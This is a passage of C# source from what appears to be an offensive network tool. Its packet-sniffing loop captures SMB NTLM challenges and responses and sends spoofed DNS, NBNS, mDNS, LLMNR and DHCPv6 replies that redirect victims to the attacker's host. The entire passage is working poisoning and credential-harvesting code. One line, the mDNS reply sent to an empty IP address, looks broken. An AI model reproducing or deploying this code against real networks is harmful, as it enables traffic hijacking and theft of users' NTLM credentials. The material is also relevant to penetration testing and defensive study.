byte[] payloadBytes = binaryReader.ReadBytes(packetLength); string challenge = ""; string session = ""; string tcpSession = sourceIPAddress.ToString() + ":" + Convert.ToString(tcpSourcePort); string tcpFlagsBinary = Convert.ToString(tcpFlags, 2); tcpFlagsBinary = tcpFlagsBinary.PadLeft(8, '0'); if (String.Equals(tcpFlagsBinary.Substring(6, 1), "1") && String.Equals(tcpFlagsBinary.Substring(3, 1), "0") && destinationIPAddress.ToString() == snifferIP) { lock (Program.outputList) { Program.outputList.Add(String.Format("[+] [{0}] TCP({1}) SYN packet from {2}", DateTime.Now.ToString("s"), tcpDestinationPort, tcpSession)); } } switch (tcpDestinationPort) { case 139: if (payloadBytes.Length > 0) { SMBConnection(payloadBytes, snifferIP, sourceIPAddress.ToString(), destinationIPAddress.ToString(), Convert.ToString(tcpSourcePort), "139"); } session = sourceIPAddress.ToString() + ":" + Convert.ToString(tcpSourcePort); if (Program.smbSessionTable.ContainsKey(session)) { NTLM.GetNTLMResponse(payloadBytes, sourceIPAddress.ToString(), Convert.ToString(tcpSourcePort), "SMB", "139"); } break; case 445: if (payloadBytes.Length > 0) { SMBConnection(payloadBytes, snifferIP, sourceIPAddress.ToString(), destinationIPAddress.ToString(), Convert.ToString(tcpSourcePort), "445"); } session = sourceIPAddress.ToString() + ":" + Convert.ToString(tcpSourcePort); if (Program.smbSessionTable.ContainsKey(session)) { NTLM.GetNTLMResponse(payloadBytes, sourceIPAddress.ToString(), Convert.ToString(tcpSourcePort), "SMB", "445"); } break; } switch (tcpSourcePort) { case 139: if (payloadBytes.Length > 0) { challenge = NTLM.GetSMBNTLMChallenge(payloadBytes); } session = destinationIPAddress.ToString() + ":" + Convert.ToString(tcpDestinationPort); if (!string.IsNullOrEmpty(challenge) && destinationIP != sourceIP) { if (!String.Equals(destinationIP, snifferIP)) { lock (Program.outputList) { Program.outputList.Add(String.Format("[+] [{0}] SMB({1}) NTLM challenge {2} sent to {3}", DateTime.Now.ToString("s"), tcpSourcePort, challenge, session)); } } else { lock (Program.outputList) { Program.outputList.Add(String.Format("[+] [{0}] SMB({1}) NTLM challenge {2} from {3}", DateTime.Now.ToString("s"), tcpSourcePort, challenge, session)); } } Program.smbSessionTable[session] = challenge; } break; case 445: if (payloadBytes.Length > 0) { challenge = NTLM.GetSMBNTLMChallenge(payloadBytes); } session = destinationIPAddress.ToString() + ":" + Convert.ToString(tcpDestinationPort); if (!String.IsNullOrEmpty(challenge) && destinationIP != sourceIP) { if (!String.Equals(destinationIP, snifferIP)) { lock (Program.outputList) { Program.outputList.Add(String.Format("[+] [{0}] SMB({1}) NTLM challenge {2} sent to {3}", DateTime.Now.ToString("s"), tcpSourcePort, challenge, session)); } } else { lock (Program.outputList) { Program.outputList.Add(String.Format("[+] [{0}] SMB({1}) NTLM challenge {2} from {3}", DateTime.Now.ToString("s"), tcpSourcePort, challenge, session)); } } Program.smbSessionTable[session] = challenge; } break; } if (Program.enabledPcap && String.Equals(ipVersion, "IPv4") && (pcapTCP != null && pcapTCP.Length > 0 && (Array.Exists(pcapTCP, element => element == tcpSourcePort.ToString()) || Array.Exists(pcapTCP, element => element == tcpDestinationPort.ToString()) || Array.Exists(pcapTCP, element => element == "ALL")))) { PcapOutput((uint)packetLength, byteData); } break; case 17: byte[] udpSourcePort = binaryReader.ReadBytes(2); uint endpointSourcePort = Util.DataToUInt16(udpSourcePort); uint udpDestinationPort = Util.DataToUInt16(binaryReader.ReadBytes(2)); uint udpLength = Util.DataToUInt16(binaryReader.ReadBytes(2)); binaryReader.ReadBytes(2); byte[] udpPayload; try { udpPayload = binaryReader.ReadBytes(((int)udpLength - 2) * 4); } catch { udpPayload = new byte[2]; } switch (udpDestinationPort) { case 53: string dnsRequestHost = Util.ParseNameQuery(12, udpPayload); byte[] dnsRequest = new byte[dnsRequestHost.Length + 2]; System.Buffer.BlockCopy(udpPayload, 12, dnsRequest, 0, dnsRequest.Length); string[] dnsRequestSplit = dnsRequestHost.Split('.'); byte[] dnsRequestRecordType = new byte[2]; System.Buffer.BlockCopy(udpPayload, (dnsRequest.Length + 12), dnsRequestRecordType, 0, 2); string dnsRecordType = Util.GetRecordType(dnsRequestRecordType); string dnsResponseMessage = Util.CheckRequest(dnsRequestHost, sourceIPAddress.ToString(), snifferIP.ToString(), "DNS", dnsRecordType, dnsTypes); if (Program.enabledDNS && String.Equals(dnsResponseMessage, "response sent")) { if ((int)udpPayload[2] != 40) { byte[] dnsResponse = DNS.GetDNSResponse("sniffer", ipVersion, dnsDomainController, dnsTTL, dnsRecordType, sourceIPAddress, destinationIPAddress, spooferIPData, udpSourcePort, udpPayload); UDP.UDPSnifferClient(null, 0, sourceIPAddress, (int)endpointSourcePort, ipVersion, dnsResponse); } else { byte[] dnsResponse = DNS.GetDNSResponse("sniffer", ipVersion, dnsDomainController, dnsTTL, dnsRecordType, sourceIPAddress, destinationIPAddress, spooferIPData, udpSourcePort, udpPayload); UDP.UDPSnifferClient(null, 0, sourceIPAddress, (int)endpointSourcePort, ipVersion, dnsResponse); } } if (String.Equals(destinationIPAddress.ToString(), snifferIP.ToString())) { lock (Program.outputList) { Program.outputList.Add(String.Format("[+] [{0}] DNS({1}) request for {2} from {3} [{4}]", DateTime.Now.ToString("s"), dnsRecordType, dnsRequestHost, sourceIPAddress, dnsResponseMessage)); } } else { lock (Program.outputList) { Program.outputList.Add(String.Format("[+] [{0}] DNS({1}) request for {2} sent to {3} [{4}]", DateTime.Now.ToString("s"), dnsRecordType, dnsRequestHost, destinationIPAddress, "outgoing query")); } } break; case 137: if (String.Equals(ipVersion, "IPv4")) { byte[] nbnsQuestionsAnswerRRs = new byte[4]; System.Buffer.BlockCopy(udpPayload, 4, nbnsQuestionsAnswerRRs, 0, 4); byte[] nbnsAdditionalRRs = new byte[2]; System.Buffer.BlockCopy(udpPayload, 10, nbnsAdditionalRRs, 0, 2); if (String.Equals(BitConverter.ToString(nbnsQuestionsAnswerRRs), "00-01-00-00") && !String.Equals(BitConverter.ToString(nbnsAdditionalRRs), "00-01")) { byte[] nbnsRequestType = new byte[2]; System.Buffer.BlockCopy(udpPayload, 43, nbnsRequestType, 0, 2); string nbnsQueryType = NBNS.NBNSQueryType(nbnsRequestType); byte[] nbnsType = new byte[1]; System.Buffer.BlockCopy(udpPayload, 47, nbnsType, 0, 1); byte[] nbnsRequest = new byte[udpPayload.Length - 20]; System.Buffer.BlockCopy(udpPayload, 13, nbnsRequest, 0, nbnsRequest.Length); string nbnsRequestHost = NBNS.BytesToNBNSQuery(nbnsRequest); string nbnsResponseMessage = Util.CheckRequest(nbnsRequestHost, sourceIPAddress.ToString(), snifferIP.ToString(), "NBNS", nbnsQueryType, nbnsTypes); if (Program.enabledNBNS && String.Equals(nbnsResponseMessage, "response sent")) { if (Array.Exists(nbnsTypes, element => element == nbnsQueryType) && !String.Equals(BitConverter.ToString(nbnsType), "21")) { byte[] nbnsResponse = NBNS.GetNBNSResponse("sniffer", nbnsTTL, spooferIPData, udpSourcePort, udpPayload); UDP.UDPSnifferClient(null, 0, sourceIPAddress, (int)endpointSourcePort, ipVersion, nbnsResponse); } else if (String.Equals(BitConverter.ToString(nbnsType), "21")) { nbnsResponseMessage = "NBSTAT request"; } else { nbnsResponseMessage = "NBNS type disabled"; } } lock (Program.outputList) { Program.outputList.Add(String.Format("[+] [{0}] NBNS request for {1}<{2}> from {3} [{4}]", DateTime.Now.ToString("s"), nbnsRequestHost, nbnsQueryType, sourceIPAddress, nbnsResponseMessage)); } } } break; case 547: if (String.Equals(ipVersion, "IPv6")) { byte[] dhcpv6MessageTypeID = new byte[1]; Buffer.BlockCopy(udpPayload, 0, dhcpv6MessageTypeID, 0, 1); byte[] dhcpv6ClientMACData = new byte[6]; Buffer.BlockCopy(udpPayload, 22, dhcpv6ClientMACData, 0, 6); string dhcpv6ClientMAC = BitConverter.ToString(dhcpv6ClientMACData).Replace("-", ":"); byte[] dhcpv6IAID = new byte[4]; if ((int)dhcpv6MessageTypeID[0] == 1) { Buffer.BlockCopy(udpPayload, 32, dhcpv6IAID, 0, 4); } else { Buffer.BlockCopy(udpPayload, 46, dhcpv6IAID, 0, 4); } byte[] dhcpv6ClientIP = new byte[16]; string dhcpv6LeaseIP = ""; string dhcpv6FQDN = ""; if ((int)dhcpv6MessageTypeID[0] == 1 || (int)dhcpv6MessageTypeID[0] == 3 || (int)dhcpv6MessageTypeID[0] == 5) { for (i = 12; i < udpPayload.Length; i++) { if (Util.UInt16DataLength(i, udpPayload) == 39) { dhcpv6FQDN = Util.ParseNameQuery((i + 4), udpPayload); } } int index = BitConverter.ToString(udpPayload).Replace("-", String.Empty).IndexOf("4D53465420352E30"); if (index >= 0 && Program.dhcpv6ClientTable.ContainsKey(dhcpv6ClientMAC)) { dhcpv6LeaseIP = Program.dhcpv6ClientTable[dhcpv6ClientMAC].ToString(); dhcpv6ClientIP = IPAddress.Parse(dhcpv6LeaseIP).GetAddressBytes(); } else if (index >= 0 && !Program.dhcpv6ClientTable.ContainsKey(dhcpv6ClientMAC)) { dhcpv6LeaseIP = "fe80::" + ipv6RandomValue + ":" + dhcpv6IPIndex; dhcpv6ClientIP = IPAddress.Parse(dhcpv6LeaseIP).GetAddressBytes(); Program.dhcpv6ClientTable.Add(dhcpv6ClientMAC, dhcpv6LeaseIP); dhcpv6IPIndex++; lock (Program.dhcpv6FileList) { Program.dhcpv6FileList.Add(dhcpv6ClientMAC + "," + dhcpv6LeaseIP); } } string dhcpv6ResponseMessage = DHCPv6.DHCPv6Output(dhcpv6ClientMAC, dhcpv6FQDN, dhcpv6LeaseIP, sourceIPAddress.ToString(), index, (int)dhcpv6MessageTypeID[0]); if (String.Equals(dhcpv6ResponseMessage, "response sent")) { byte[] dhcpv6Response = DHCPv6.GetDHCPv6Response("sniffer", dhcpv6DomainSuffix, sourceIPAddress, destinationIPAddress, dhcpv6ClientIP, spooferIPv6Data, snifferMACArray, udpSourcePort, udpPayload); UDP.UDPSnifferClient(destinationIPAddress, 547, sourceIPAddress, 546, ipVersion, dhcpv6Response); } } } break; case 5353: if (String.Equals(ipVersion, "IPv4")) { string mdnsResponseMessage = ""; byte[] mdnsType = new byte[2]; if (BitConverter.ToString(udpPayload).EndsWith("-00-01-80-01") && String.Equals(BitConverter.ToString(udpPayload).Substring(12, 23), "00-01-00-00-00-00-00-00")) { //udpLength += 10; byte[] ttlMDNS = BitConverter.GetBytes(Int32.Parse(mdnsTTL)); Array.Reverse(ttlMDNS); byte[] mdnsTransactionID = new byte[2]; string mdnsRequestHostFull = Util.ParseNameQuery(12, udpPayload); System.Buffer.BlockCopy(udpPayload, 0, mdnsTransactionID, 0, 2); byte[] mdnsRequest = new byte[mdnsRequestHostFull.Length + 2]; System.Buffer.BlockCopy(udpPayload, 12, mdnsRequest, 0, mdnsRequest.Length); string[] mdnsRequestSplit = mdnsRequestHostFull.Split('.'); if (mdnsRequestSplit != null && mdnsRequestSplit.Length > 0) { mdnsResponseMessage = Util.CheckRequest(mdnsRequestSplit[0], sourceIPAddress.ToString(), snifferIP.ToString(), "MDNS", "QU", mdnsQuestions); } if (Program.enabledMDNS && String.Equals(mdnsResponseMessage, "response sent")) { if (Array.Exists(mdnsQuestions, element => element == "QU")) { byte[] mdnsResponse = MDNS.GetMDNSResponse("sniffer", ipVersion, mdnsTTL, sourceIPAddress, destinationIPAddress, spooferIPData, spooferIPv6Data, udpSourcePort, udpPayload); UDP.UDPSnifferClient(null, 0, sourceIPAddress, (int)endpointSourcePort, ipVersion, mdnsResponse); } else { mdnsResponseMessage = "mDNS type disabled"; } } lock (Program.outputList) { Program.outputList.Add(String.Format("[+] [{0}] mDNS(QU) request for {1} from {2} [{3}]", DateTime.Now.ToString("s"), mdnsRequestHostFull, sourceIPAddress, mdnsResponseMessage)); } } else if (BitConverter.ToString(udpPayload).EndsWith("-00-01") && (String.Equals(BitConverter.ToString(udpPayload).Substring(12, 23), "00-01-00-00-00-00-00-00") || String.Equals(BitConverter.ToString(udpPayload).Substring(12, 23), "00-02-00-00-00-00-00-00"))) { //udpLength += 4; byte[] ttlMDNS = BitConverter.GetBytes(Int32.Parse(mdnsTTL)); Array.Reverse(ttlMDNS); byte[] mdnsTransactionID = new byte[2]; System.Buffer.BlockCopy(udpPayload, 0, mdnsTransactionID, 0, 2); string mdnsRequestHostFull = Util.ParseNameQuery(12, udpPayload); byte[] mdnsRequest = new byte[mdnsRequestHostFull.Length + 2]; System.Buffer.BlockCopy(udpPayload, 12, mdnsRequest, 0, mdnsRequest.Length); string[] mdnsRequestSplit = mdnsRequestHostFull.Split('.'); if (mdnsRequestSplit != null && mdnsRequestSplit.Length > 0) { mdnsResponseMessage = Util.CheckRequest(mdnsRequestSplit[0], sourceIPAddress.ToString(), snifferIP.ToString(), "MDNS", "QM", mdnsQuestions); } if (Program.enabledMDNS && String.Equals(mdnsResponseMessage, "response sent")) { if (Array.Exists(mdnsQuestions, element => element == "QM")) { byte[] mdnsResponse = MDNS.GetMDNSResponse("sniffer", ipVersion, mdnsTTL, sourceIPAddress, destinationIPAddress, spooferIPData, spooferIPv6Data, udpSourcePort, udpPayload); UDP.UDPSnifferClient(null, 0, IPAddress.Parse(""), 5353, ipVersion, mdnsResponse); } else { mdnsResponseMessage = "mDNS type disabled"; } } lock (Program.outputList) { Program.outputList.Add(String.Format("[+] [{0}] mDNS(QM) request for {1} from {2} [{3}]", DateTime.Now.ToString("s"), mdnsRequestHostFull, sourceIPAddress, mdnsResponseMessage)); } } } break; case 5355: string llmnrResponseMessage = ""; byte[] ttlLLMNR = BitConverter.GetBytes(Int32.Parse(llmnrTTL)); Array.Reverse(ttlLLMNR); byte[] llmnrType = new byte[2]; System.Buffer.BlockCopy(udpPayload, (udpPayload.Length - 4), llmnrType, 0, 2); if (String.Equals(ipVersion, "IPv4") && !String.Equals(BitConverter.ToString(llmnrType), "00-1C") || String.Equals(ipVersion, "IPv6") && String.Equals(BitConverter.ToString(llmnrType), "00-1C")) { udpLength += (byte)(udpPayload.Length - 2); Array.Reverse(udpSourcePort); byte[] llmnrTransactionID = new byte[2]; System.Buffer.BlockCopy(udpPayload, 0, llmnrTransactionID, 0, 2); byte[] llmnrRequest = new byte[udpPayload.Length - 18]; byte[] llmnrRequestLength = new byte[1]; System.Buffer.BlockCopy(udpPayload, 12, llmnrRequestLength, 0, 1); System.Buffer.BlockCopy(udpPayload, 13, llmnrRequest, 0, llmnrRequest.Length); string llmnrRequestHost = Util.ParseNameQuery(12, udpPayload); string llmnrVersion = "LLMNR"; if (String.Equals(ipVersion, "IPv6")) { llmnrVersion = "LLMNRv6"; } llmnrResponseMessage = Util.CheckRequest(llmnrRequestHost, sourceIPAddress.ToString(), snifferIP.ToString(), llmnrVersion, null, null); if (String.Equals(llmnrResponseMessage, "response sent")) { byte[] llmnrResponse = LLMNR.GetLLMNRResponse("sniffer", ipVersion, llmnrTTL, sourceIPAddress, destinationIPAddress, spooferIPData, spooferIPv6Data, udpSourcePort, udpPayload); UDP.UDPSnifferClient(null, 0, sourceIPAddress, (int)endpointSourcePort, ipVersion, llmnrResponse); } lock (Program.outputList) { Program.outputList.Add(String.Format("[+] [{0}] {1} request for {2} from {3} [{4}]", DateTime.Now.ToString("s"), llmnrVersion, llmnrRequestHost, sourceIPAddress, llmnrResponseMessage)); } } break; } if (Program.enabledPcap && String.Equals(ipVersion, "IPv4") && (pcapUDP != null && pcapUDP.Length > 0 && (Array.Exists(pcapUDP, element => element == udpSourcePort.ToString()) || Array.Exists(pcapUDP, element => element == udpDestinationPort.ToString()) || Array.Exists(pcapUDP, element => element == "ALL")))) { PcapOutput((uint)packetLength, byteData); } break; } } } catch (Exception ex) { Program.outputList.Add(String.Format("[-] [{0}] Packet sniffing error detected - {1}", DateTime.Now.ToString("s"), ex.ToString())); } } }